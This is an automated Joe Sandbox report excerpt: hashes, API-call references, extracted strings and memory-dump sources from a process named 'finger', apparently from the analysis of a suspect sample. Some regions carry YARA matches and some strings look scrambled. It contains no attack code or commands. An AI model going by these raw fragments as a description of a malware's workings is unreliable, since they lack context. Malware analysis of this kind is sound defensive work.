                                                                                                      • Instruction Fuzzy Hash: 61F06D7228070436E23266AA8C06FDB7A9CDFC1B60F140018F708AA2C1D9A6B84086F8
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00601C06,?,B4613DF6,00601C06,oXa,B4613DF6,?,00601C06,oXa,00001000,?,?,00000000), ref: 00619979
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction ID: 347db8c34d9f9d42f0ee2abbfe7b77f0f08c3b04a7e495c57e59edce2abebe0b
                                                                                                      • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction Fuzzy Hash: 8DE092712042047BDA10EE59DC46EDB37ADEFC5710F004409F908A7241D631B851C7B8
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0060853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                                      • Instruction ID: d372e6111aa8fb7d2278b546d3a39dd5c7c4b7bceeb076fcbf4c85bd97a0c11e
                                                                                                      • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                                      • Instruction Fuzzy Hash: 87E086712903042BEB68AAA8DC47FE7335DAB88738F184660BD5DDB3C2E978F9514154
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0060853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                                      • Instruction ID: 4220c0cccaf3dac2a2c33ca111107f371832736c5bae3fc668cf48b1e8e2e88f
                                                                                                      • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                                      • Instruction Fuzzy Hash: 99E026B64803002BE725A6A49E477EB36196B41338F2C0A64F9A99F2C3E53CD5524224
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00601EF0,006181AF,oXa,00601EC0), ref: 00608333
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                                      • Instruction ID: daf86e1dc337c68d64d5361d18b47f2a6f0d62db46f10e43f8b2dc46b87407d3
                                                                                                      • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                                      • Instruction Fuzzy Hash: CBD05E713803053BEA44F6E4DC07F96368D9B40794F050074BA0CDB2C2E969F5004269
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 7cb2ded272928ce2034a7a69d155519340505ab0d6479e82444e303be38e2d74
                                                                                                      • Instruction ID: 38f7cfb229ad54644fe3ccd893dd09929f8f2cda5554e5cd8595bb10683844ee
                                                                                                      • Opcode Fuzzy Hash: 7cb2ded272928ce2034a7a69d155519340505ab0d6479e82444e303be38e2d74
                                                                                                      • Instruction Fuzzy Hash: 18B09B719039D5C5EA51E76046087177D5867D1701F29C4A1E2074641F4739C1D5F275
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                                      • Instruction ID: 1c80d643dc6a3d5cad10ecdca24f86e3bb945f96486c444ebedc585c8d360ac1
                                                                                                      • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                                      • Instruction Fuzzy Hash: 3441237065CB0D4FD368EF68D08127AB3E2FB84304F54A52DD98BC7252EB70E8478A84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                                      • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                                                                      • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                                      • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                      • API String ID: 0-3558027158
                                                                                                      • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                                      • Instruction ID: 30ddaa1331b112d43e6d8209729c3be195756f678696b11f58281c2b34213842
                                                                                                      • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                                      • Instruction Fuzzy Hash: 89915FF04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                                                                      • API String ID: 0-2065742749
                                                                                                      • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                                      • Instruction ID: 274cd91a5d6006eb78bfb6d35aaf7b95c42ca36970d3c35a56da2190f3d4a0b3
                                                                                                      • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                                      • Instruction Fuzzy Hash: 844102B480078CEBCF18CF85D5416DEBB71FF05384F908059E9096F294C7758656CB8A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 8bbf19137e1a689b43564fd3942a31b41eb1f30e93392e2cd30247d86ab22d34
                                                                                                      • Instruction ID: a006180445f1160aaf5a4e758be28af108d2f1150fb4fab89022bf101dca2647
                                                                                                      • Opcode Fuzzy Hash: 8bbf19137e1a689b43564fd3942a31b41eb1f30e93392e2cd30247d86ab22d34
                                                                                                      • Instruction Fuzzy Hash: 505139B5B06126BFDB61DFD988809BFFBFCBB49200B548669E855D7640D234DE00CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 986a6d06531dba18b5554a135678a42ce8a3a77e89c34066cf8ff078c4ee2637
                                                                                                      • Instruction ID: beb2638b0b3cc89ff28add3ade6ac6f0eaf2272eb495d0ee9bbe40ddf47f561d
                                                                                                      • Opcode Fuzzy Hash: 986a6d06531dba18b5554a135678a42ce8a3a77e89c34066cf8ff078c4ee2637
                                                                                                      • Instruction Fuzzy Hash: E75114B5A01649BEEF20DF9CC88097FB7FDAF44200B088C9AE596C7641E774DA409B60
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03054742
                                                                                                      • Execute=1, xrefs: 03054713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030546FC
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03054655
                                                                                                      • ExecuteOptions, xrefs: 030546A0
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03054787
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03054725
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: d21b7e2dff73da8af09bcac901d7f6e64f49a2cf248cad56a57854eaa066940e
                                                                                                      • Instruction ID: f292cbf5ce131dc3e78dd43e7b8ebb4769c15a75b9e25fa300ad4582c5d8620e
                                                                                                      • Opcode Fuzzy Hash: d21b7e2dff73da8af09bcac901d7f6e64f49a2cf248cad56a57854eaa066940e
                                                                                                      • Instruction Fuzzy Hash: CC513C35A0231A7AEF11EBA5EC85FEF77E8EF44700F1404D9E906AB181DB719A618F50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction ID: 71abbea1654adc4d954818849e1272d936493781e03822459052ff1e8e2a1a83
                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction Fuzzy Hash: AF81AA30E076699FDF28CE68C8947EEBFE6AF45320F1C465AD865A7391C6388841CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 26fb1d8948e53df70d3cd0bada400280d96e3297f1e8542e34f6d482ed09e395
                                                                                                      • Instruction ID: d4892c213d8ac37792015594265c9ae213720db7d9f473b418878393e673e6f4
                                                                                                      • Opcode Fuzzy Hash: 26fb1d8948e53df70d3cd0bada400280d96e3297f1e8542e34f6d482ed09e395
                                                                                                      • Instruction Fuzzy Hash: 3121817AA0221DABEB10DE69DC50AEEBBECAF54640F080526E905E7200E730D9119BA1
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 0305031E
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030502BD
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030502E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 5b290e72f392d1556c8b770b9673151c107426d6428854c6e5eb5a06dadd5644
                                                                                                      • Instruction ID: a7fef09cf2429b43ebc34e0c3511233d790a8da7b063c55a40b117e677bdcf7f
                                                                                                      • Opcode Fuzzy Hash: 5b290e72f392d1556c8b770b9673151c107426d6428854c6e5eb5a06dadd5644
                                                                                                      • Instruction Fuzzy Hash: 99E1BE3060A7429FE765CF28C884B6EB7E4BF84314F180A6DF9A58B2E1D774D945CB42
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 03057BAC
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03057B7F
                                                                                                      • RTL: Resource at %p, xrefs: 03057B8E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: d692f0faae1b9e4c7927a08a05d46e590b8be7bb8edffb1c384c97915157f8b4
                                                                                                      • Instruction ID: 8550d1b9a050fbdac6854fdac464c43c2043319d0885c0e0f206eb7cdd863eac
                                                                                                      • Opcode Fuzzy Hash: d692f0faae1b9e4c7927a08a05d46e590b8be7bb8edffb1c384c97915157f8b4
                                                                                                      • Instruction Fuzzy Hash: 8E41D1357027029FD724DE29C840BABB7E5EF88720F140A1DF95ADB680DB71E8158B91
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0305728C
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 030572C1
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03057294
                                                                                                      • RTL: Resource at %p, xrefs: 030572A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 5250a84c0569908d5d0fbee2b4d295d9c81a357cb79d744c9496539c9dda3250
                                                                                                      • Instruction ID: b7a9e589890bfa02593aa0c590dbfe4dbfbb6f74bdf5f3e412579bacfb2326ab
                                                                                                      • Opcode Fuzzy Hash: 5250a84c0569908d5d0fbee2b4d295d9c81a357cb79d744c9496539c9dda3250
                                                                                                      • Instruction Fuzzy Hash: A041FF35702306ABD720DE25CC41BAAB7E9FF84B10F144A19FD55EB640DB21E8129BD0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: 7d3cbe4ec9380a83a4ce090e9da2f4aa4c7374d60bfbfbb1439894ef2403ea9d
                                                                                                      • Instruction ID: f4065f3bf1f0d21ecf9deede7d06ddcb371b447083b78fb4733359fe6e109ee8
                                                                                                      • Opcode Fuzzy Hash: 7d3cbe4ec9380a83a4ce090e9da2f4aa4c7374d60bfbfbb1439894ef2403ea9d
                                                                                                      • Instruction Fuzzy Hash: AA318776A0121DAFDF60DE29DC40BEEB7FCEF44650F454596E849D3100EB309A449FA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction ID: 04738edee3afcb325532a709a69817319c653b3b4530badeb0f4e8273c29d78c
                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction Fuzzy Hash: 3891D574E0623A9BDFA4DE69C8817BEBFF5AF44B20F18451AE865E72C1D73089408721
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: cc809f5acc7d5a7538b24569f0a0a5416a424d402693fe455c7a2f012d17cccd
                                                                                                      • Instruction ID: d07ac4ef11024c27df08ddcd2371114ae60df116c2b411c013a04d9ce56b7dbf
                                                                                                      • Opcode Fuzzy Hash: cc809f5acc7d5a7538b24569f0a0a5416a424d402693fe455c7a2f012d17cccd
                                                                                                      • Instruction Fuzzy Hash: A0813CB5D012699BDB31DB54CC44BEEB7B8AF48750F0445EAEA19B7280D7705E80CFA0
                                                                                                      APIs
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0306CFBD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallFilterFunc@8
                                                                                                      • String ID: @$@4Qw@4Qw
                                                                                                      • API String ID: 4062629308-2383119779
                                                                                                      • Opcode ID: aa4af5e226bd5994cc37b8869978df7f8b39ac300ea5e85eb3bf654946d27c1d
                                                                                                      • Instruction ID: c8b3c32f4b65a1bd11c6f3b2ab226b94420afee8afe8445f5dc64df957fcdb12
                                                                                                      • Opcode Fuzzy Hash: aa4af5e226bd5994cc37b8869978df7f8b39ac300ea5e85eb3bf654946d27c1d
                                                                                                      • Instruction Fuzzy Hash: 6241CB75A02618DFDB21DFA8D940AAEBBF8EF44B00F04406AEA10DB268D774D800CF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$0$@$@
                                                                                                      • API String ID: 0-1132210376
                                                                                                      • Opcode ID: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                                      • Instruction ID: 85e4b472255c9df236b1f32f3ec6d963e49cf9f3ffaf5566887b34f6d4c35a7e
                                                                                                      • Opcode Fuzzy Hash: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                                                                      • Instruction Fuzzy Hash: 7F51B1706587488FCB18CF68C8856DEBBF0FB89714F10559EE98AD7241C734E546CB86